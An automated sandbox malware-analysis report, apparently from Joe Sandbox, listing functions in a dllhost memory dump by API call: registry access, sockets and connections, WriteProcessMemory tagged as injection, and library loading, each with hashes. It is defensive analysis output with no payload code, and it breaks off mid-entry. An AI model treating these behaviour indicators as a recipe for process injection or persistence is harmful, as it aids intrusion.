Instruction ID: ef6a0fba937e79b1d1ae5876c792ba5462f40be3164aec0fbe4e0d588bec7bea
Opcode Fuzzy Hash: e17af4163391c00c3e851a98b833c3c21f6ce316e40d39a719dc0b3356e4248d
Instruction Fuzzy Hash: A031E8750097846FEB228F61DC45FA6FFB8EF46314F08849EEA848B153D375A408CB65

Function 0686377A Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNEL32(?,00000E24), ref: 06863815

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1f951852fc31d2d9197cbe66d9852b1d9a02be936c36232d9bb933deaf3c4118
Instruction ID: f0998e3b01fe320299a245d9bcaeff96b6bcb0b9f5d4831a4b633c3f4f3c25a2
Opcode Fuzzy Hash: 1f951852fc31d2d9197cbe66d9852b1d9a02be936c36232d9bb933deaf3c4118
Instruction Fuzzy Hash: FE21A0B6504204AFEB21CE16CC45FABFBECEF08614F04846AFA45D7651E730E504CAB2

Function 0083AF4A Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 0083AFF0

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: b7cbe0a2fd836786512a15447798e4d82fac024ca1e84a18bf23236be7f84f41
Instruction ID: 64fa9305cafbc3b94ed0883c98a4632f1645de548131abb0e240d159b49f0d26
Opcode Fuzzy Hash: b7cbe0a2fd836786512a15447798e4d82fac024ca1e84a18bf23236be7f84f41
Instruction Fuzzy Hash: 0C2180B65087405FE722CF11CC44FA6BBF8EF46710F08849AE985CB192D364E908C7A2

Function 0083A120 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

EnumWindows.USER32(?,00000E24,?,?), ref: 0083A1BD

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 81e413629b529d05f1a46662635f5c5da391ad5864d354279d3bc2db9fe08167
Instruction ID: 1c20c14e217b732868faf91152680b4d4509f2155f84fe260f660288fac854b9
Opcode Fuzzy Hash: 81e413629b529d05f1a46662635f5c5da391ad5864d354279d3bc2db9fe08167
Instruction Fuzzy Hash: 2E31947140D3C06FD3128B258C55B66BFB4EF47610F0985DBD8C49F5A3D229A919C7B2

Function 06861FEA Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E24), ref: 0686208F

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 92a0d2a02b5a16e555de9ee15db47c1974d358e6c77576c5dd9535b3fadae8af
Instruction ID: 6115949cdf445c3584fa0e19761ea810ded80353887d50f84ce0ffe284e23022
Opcode Fuzzy Hash: 92a0d2a02b5a16e555de9ee15db47c1974d358e6c77576c5dd9535b3fadae8af
Instruction Fuzzy Hash: E121D3B1504204AEFB21DF51CC45FAAF7ACEF04714F04889AFA489B181D7B5A548CBB2

Function 06863B9E Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.KERNEL32(?,00000E24,?,?), ref: 06863C4A

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 1150fbcd6e1c88ec4b5d6741da8fbdd23969ab3980fadb24dde6f6ee245ad6cf
Instruction ID: d95e65cf9810d2bf2b9f16f9c5361a19c0ac6de5821f9fa64c8dd0712dc54cff
Opcode Fuzzy Hash: 1150fbcd6e1c88ec4b5d6741da8fbdd23969ab3980fadb24dde6f6ee245ad6cf
Instruction Fuzzy Hash: A131756150D3C06FD3138B258C65B22BFB4DF87610F1E80DBD8848B6A3D125A919D7B2

Function 0083A8A0 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 0083A935

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 49a80276277221e499c133f29a919049a3a9337cb64f214e4cd5ff212fc854ef
Instruction ID: 8595b65071f17f02b025a1aa447f1172328a7a32b6f460925e10860df1334520
Opcode Fuzzy Hash: 49a80276277221e499c133f29a919049a3a9337cb64f214e4cd5ff212fc854ef
Instruction Fuzzy Hash: FD21FBB54097805FE7128B21DC45B66BFACEF46720F0980DAED849B193D264A909C7B2

Function 068639ED Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

select.WS2_32(?,?,?,?,?), ref: 06863A7C

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: d4e998beca17472ad2c3d5e296944789c3b4197671ba149dc5a10efddcd7496b
Instruction ID: f687dc1c8d9b62b87158f6a72a885d1a560757a5b59c7a4b93eb2d558b933851
Opcode Fuzzy Hash: d4e998beca17472ad2c3d5e296944789c3b4197671ba149dc5a10efddcd7496b
Instruction Fuzzy Hash: D3217C715097849FDB22CF65CC44B92BFF8EF06210F0884DAE988DB163E235E909DB61

Function 0083B046 Relevance: 1.6, APIs: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 0083B0DC

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d39f2642fba21e9f5ed7023cdeea7c5f711a8ee9e84c6b86caf44f7781887326
Instruction ID: 3066141c8cd74e29313ae9972c7d46b62524a23704ae0ec45143726f7efa2a00
Opcode Fuzzy Hash: d39f2642fba21e9f5ed7023cdeea7c5f711a8ee9e84c6b86caf44f7781887326
Instruction Fuzzy Hash: 562190B65087806FE7228B11CC45F67FFB8EF46710F08849AE985DB252D364E808CBB1

Function 0686148E Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 0686151A

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: f2ef6d31acdaae5459e91f085749d6e6d8688e9d0e0a06a1264d19e5c8065ed3
Instruction ID: dfca4a02b6a8edb205b661f0b4270e15f4a38c9a089fdbf47f2595561bc16f2c
Opcode Fuzzy Hash: f2ef6d31acdaae5459e91f085749d6e6d8688e9d0e0a06a1264d19e5c8065ed3
Instruction Fuzzy Hash: 22219175409380AFE721CF55CC49F66FFB8EF05210F08849EE9858B192D375A408CBA2

Function 06861A6A Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 06861AFE

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 496a535895c8b742eacdd577079588ce1dd3612bcbe603b82f466e5468feeb3e
Instruction ID: 25ba63e3e30e290a2416f68826c044110a9ddf9797b68a8f5bfecc4b6a183dbb
Opcode Fuzzy Hash: 496a535895c8b742eacdd577079588ce1dd3612bcbe603b82f466e5468feeb3e
Instruction Fuzzy Hash: E2219175409340AFE722CF55CC49F66FFF8EF09214F08849EEA858B252D375A509CB62

Function 0083A7CA Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0083A849

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 713ed7ae8cbd7b7a0dbf0390947a7cd609863fda1773cd73fd4c183dec20b552
Instruction ID: dc95d810f6a6ca3ac6d709e50c4a37fcb3acca974b4c4aee869d5a05804408a0
Opcode Fuzzy Hash: 713ed7ae8cbd7b7a0dbf0390947a7cd609863fda1773cd73fd4c183dec20b552
Instruction Fuzzy Hash: 95219FB5504200AFEB21CF65CD45B66FBE8FF48714F08886EEA85CB651D371E805CBA2

Function 068617C2 Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 06861860

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2178245f8f97dc17d9407aa3f3c17b067b3003eea935761b15db80545bc8c405
Instruction ID: f9dfe93a9e0dfbbec6c852a9ee188463a152e8b4149a78f254fb83da57f26bf5
Opcode Fuzzy Hash: 2178245f8f97dc17d9407aa3f3c17b067b3003eea935761b15db80545bc8c405
Instruction Fuzzy Hash: 14217F76508780AFE721CB55CC48F67BFF8EF45610F08849AEA85DB2A2D364E508CB71

Function 068618DA Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 0686194B

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 790e6609825b934cabbf28b997351118de9473552ab6cd698543f98015eddd6f
Instruction ID: 506293985677435b23a39e6a949d01a1740f6adae2433f9b233af937b0c521d6
Opcode Fuzzy Hash: 790e6609825b934cabbf28b997351118de9473552ab6cd698543f98015eddd6f
Instruction Fuzzy Hash: 6D218375504204AFFB20DE65DC45F6ABBACEF04614F08845AFE45DB252D775A4048AB2

Function 0083BE2B Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E24,?,?), ref: 0083BECA

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: fbe927426d90bdd78573b9b99bf24ea969a005299f04ff0639351fc62f3fd731
Instruction ID: 5d364408ebeeac661713088cba3dbd9ec5cd866e5f58ed5046c14c91ef1e403d
Opcode Fuzzy Hash: fbe927426d90bdd78573b9b99bf24ea969a005299f04ff0639351fc62f3fd731
Instruction Fuzzy Hash: 1521717150E3C06FD3138B258C55B26BFB8EF47610F0A80DFD8849B6A3D624A919C7B2

Function 0083B76A Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 0083B7E9

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: f551cabd95018ebcce72d1ef1c3a1f502c0a5066ba5d148b5a8a86b62552f705
Instruction ID: 16b7884be395c0cab49f10e35dec6fc93ebde03853304764c8ae99888b6dd97d
Opcode Fuzzy Hash: f551cabd95018ebcce72d1ef1c3a1f502c0a5066ba5d148b5a8a86b62552f705
Instruction Fuzzy Hash: 5421CFB6504204AFF7218F51DC45FABFBECEF48714F04845AEA45DB251D374E9088AB2

Function 06863673 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetProcessWorkingSetSize.KERNEL32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 068636EF

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: ProcessSizeWorking
String ID:
API String ID: 3584180929-0
Opcode ID: 7ae4746fe998404908c872bca5dbccc3feb6afedcdd9b24724c4f3ac3bbb997a
Instruction ID: 92fa13bfc7613f4dbffa0b5e8bd5a13d7c515865dd05e0b0e4986d877014c3cd
Opcode Fuzzy Hash: 7ae4746fe998404908c872bca5dbccc3feb6afedcdd9b24724c4f3ac3bbb997a
Instruction Fuzzy Hash: F221B0B55093806FEB11CB11CC49F6BBFA8EF45220F0884AAF944CB192D374A504CB62

Function 0083B662 Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 0083B6D5

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: d2576a7ed9ff36ae0fbfa902043c6d202ad4ac53dc28860e3c548ee15d48bf53
Instruction ID: a46c4ccec75f761d5f3c851b8b4c076daae1df38cd01d6b13a110b1ed4c11f7b
Opcode Fuzzy Hash: d2576a7ed9ff36ae0fbfa902043c6d202ad4ac53dc28860e3c548ee15d48bf53
Instruction Fuzzy Hash: F121C5B55042449FF710CF25CD46B66F7E8EF54314F08846AEE44CB242E371E804CAB2

Function 06861D01 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 06861D84

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: a264a0c7fa6222401389b28575db6ea37d3089b3718eb550bab2879dfe85ceec
Instruction ID: c8c8e83c2779413f824b150ee326046189172bf8fc5748d402a5fce5e3ded54b
Opcode Fuzzy Hash: a264a0c7fa6222401389b28575db6ea37d3089b3718eb550bab2879dfe85ceec
Instruction Fuzzy Hash: A62195B55093806FE7128B55CC49B6AFFB8EF46220F0884DBE984DB153D378A544C772

Function 0083AA52 Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 0083AAD1

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c87805fe047feced54342b39eee6123314af184612a4b956f02a39519d459fe1
Instruction ID: 22795a17d222c915c3452ca56051049a16e3a30571336ad513addd23bffa63c6
Opcode Fuzzy Hash: c87805fe047feced54342b39eee6123314af184612a4b956f02a39519d459fe1
Instruction Fuzzy Hash: 79218076409380AFEB22CF51DC44F67FFB8EF45720F08849AE9859B152D275A508CBB2

Function 0083BCB1 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0083BD32

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0fb57a8db1ab3e3bc7393c7a08baf127f6ebf5d38af0beb712a65b3f65c5f278
Instruction ID: d3f0f76f2a2a6c7ddfc3ec8c08a046e375d8b005d4b790498f6a304962fe0800
Opcode Fuzzy Hash: 0fb57a8db1ab3e3bc7393c7a08baf127f6ebf5d38af0beb712a65b3f65c5f278
Instruction Fuzzy Hash: A321AF724093C0AFDB238F61DC54B52BFB4EF4A210F0C84DAE9848B563D275A818CB61

Function 0083AF76 Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 0083AFF0

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 7d1f5f00625b673f04a09a820a3de37200dac032d5930c2c02ccaa4ad17ce64f
Instruction ID: c05b32ba4ca3479791e9ae085596227a200579045f031106801c0dcac0c92a84
Opcode Fuzzy Hash: 7d1f5f00625b673f04a09a820a3de37200dac032d5930c2c02ccaa4ad17ce64f
Instruction Fuzzy Hash: 6621AEB95006049FE721CE15CC84F67F7ECEF44714F08845AEA45CB252D770E804CAB2

Function 06863927 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 068639A3

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 0469c06bba6f3276165656cfcff945e2e4143589080211bb097927677f01a4d3
Instruction ID: 65e9bf995a07106f27a057ce7b0991567e5a2871b10b1bbe4daaa1c6294b1da0
Opcode Fuzzy Hash: 0469c06bba6f3276165656cfcff945e2e4143589080211bb097927677f01a4d3
Instruction Fuzzy Hash: F2219F754093846FE722CF51DC49F6ABFA8EF46214F08849BEA449B152D274A508CBA2

Function 0083A589 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?,EB743840,00000000,?,?,?,?,?,?,?,?,6D053C58), ref: 0083A608

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2fae58abbd9f77b4e5b7d5f4a242f3a2ddf5d062357d9c6765bbffe79ec405bf
Instruction ID: 4ea76d434bfad2d4bb298f56c3adaaff8eb9cebe9ef6f411c6eebc965ca2181c
Opcode Fuzzy Hash: 2fae58abbd9f77b4e5b7d5f4a242f3a2ddf5d062357d9c6765bbffe79ec405bf
Instruction Fuzzy Hash: D9218B754093C09FDB228F21DC44A52FFB4EF5B210F0D84DAED848B1A3D265A949DB62

Function 06861A8A Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 06861AFE

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 3e01d1a857e874eb2acc7037e0969e1e308c0e074a8510f38b469a5404722e9a
Instruction ID: e73574cd84a36600c9550d2033dfd0fdb2dba1f3b8924f0e1f00bbe2e9158c96
Opcode Fuzzy Hash: 3e01d1a857e874eb2acc7037e0969e1e308c0e074a8510f38b469a5404722e9a
Instruction Fuzzy Hash: F521A475504204AFF721CF16CD4AF6AFBE8EF08214F048459EA858B251D375A515CBB2

Function 0686219A Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 06862216

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: af417820b22628a237487a851674d2f16ee72470129b64fa3dc14462bebde9eb
Instruction ID: e02dd74365ba49d85384cb6c25aa4fa75354c16f960681538a66cd0abd5c3cea
Opcode Fuzzy Hash: af417820b22628a237487a851674d2f16ee72470129b64fa3dc14462bebde9eb
Instruction Fuzzy Hash: DE218E71408380AFDB228F55DC44B62FFF8EF4A210F0885DAED858B663D335A818DB61

Function 068614AE Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 0686151A

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: d7a623a81582227c388649874d6ad7d766b9bd20036c658cdacb51f887217cea
Instruction ID: e2f47d3aa1bc57a2b27c301192c53d340d5c8523febfc84cb1f76ad123e09a95
Opcode Fuzzy Hash: d7a623a81582227c388649874d6ad7d766b9bd20036c658cdacb51f887217cea
Instruction Fuzzy Hash: 6521C275404200AFEB21CF55DD49F6AFBE8EF08324F04885AEE858B252D375A414CBB2

Function 0083ADE8 Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?,EB743840,00000000,?,?,?,?,?,?,?,?,6D053C58), ref: 0083AE56

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 1ff2598a2d40b81659bb9279f01c889c75d8e99d1772d7c25179fa44963df9cf
Instruction ID: 7b71b6cb756d47b521198855ba69d066ce98f0f6259f158896e5fcb14d9718c3
Opcode Fuzzy Hash: 1ff2598a2d40b81659bb9279f01c889c75d8e99d1772d7c25179fa44963df9cf
Instruction Fuzzy Hash: 7E2193715093805FDB11CF65DC45B53BFE8EF46610F0884AAEC85DB262D224E804CB61

Function 0083B872 Relevance: 1.6, APIs: 1, Instructions: 66windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(?,00000E24), ref: 0083B8ED

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: MessageSendTimeout
String ID:
API String ID: 1599653421-0
Opcode ID: 4e49d56c81349b5e88da904526dff7110f48a46ba6f10e33dc015fcf7d6fdbab
Instruction ID: 821d8e360977fb00303c248cd6e721e44910adc3e2665ca4913efad3153da5ad
Opcode Fuzzy Hash: 4e49d56c81349b5e88da904526dff7110f48a46ba6f10e33dc015fcf7d6fdbab
Instruction Fuzzy Hash: 8521E1B5404204AFFB218F51DC41F66FBA8EF44714F18886AFF458B691E375A418CBB2

Function 06862532 Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E24), ref: 068625BB

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8267f0f1a7d5ffa4d07b3460c16ab6796cbc6aea8015361a8dda6a2b8ced009e
Instruction ID: ff2d700e439446e27c8a8688acbbded46e2c3d429a1111f73a563850bf7932e6
Opcode Fuzzy Hash: 8267f0f1a7d5ffa4d07b3460c16ab6796cbc6aea8015361a8dda6a2b8ced009e
Instruction Fuzzy Hash: 3A11B4754083406FE721CB11DC89FA6FBA8DF45720F0880DAFE449B192D2B4A948CBA2

Function 0083B06A Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNEL32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 0083B0DC

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4e77a91f5b2472fbbad9eefc09daf2da5f1b76ac62700c332eab64358016c633
Instruction ID: 171a43e3938b15be40d0ef616cd4e357388f6b036ac03f66d1173f208799f72b
Opcode Fuzzy Hash: 4e77a91f5b2472fbbad9eefc09daf2da5f1b76ac62700c332eab64358016c633
Instruction Fuzzy Hash: 501193B5504604AFEB218E15CC85F6BFBECEF44714F08845AEE45DB652D374E804CAB2

Function 068617EE Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,EB743840,00000000,00000000,00000000,00000000), ref: 06861860

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: b64d925040478862a644089170167b7d19c7ea8c27d62c8843f697f5da096d43
Instruction ID: e5b2437a4c055163cf5a00b1b59de2eba0d4b4d3190100cf2a077aa450b177b7
Opcode Fuzzy Hash: b64d925040478862a644089170167b7d19c7ea8c27d62c8843f697f5da096d43
Instruction Fuzzy Hash: 9211A2755006049FE761CF1ACC49F6AF7E8EF04614F08845AFA45CB262D370E504CAB2

Function 0083B1C6 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0083B22E

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 77cf0dbbe49c087e9cc4e59a3f96645fbfec4d6af543726573b4755cf30b9606
Instruction ID: 111f1e52fff028ad327ea0f7ec04ceb2c1784a57876ba1aeb4dca986a7b29232
Opcode Fuzzy Hash: 77cf0dbbe49c087e9cc4e59a3f96645fbfec4d6af543726573b4755cf30b9606
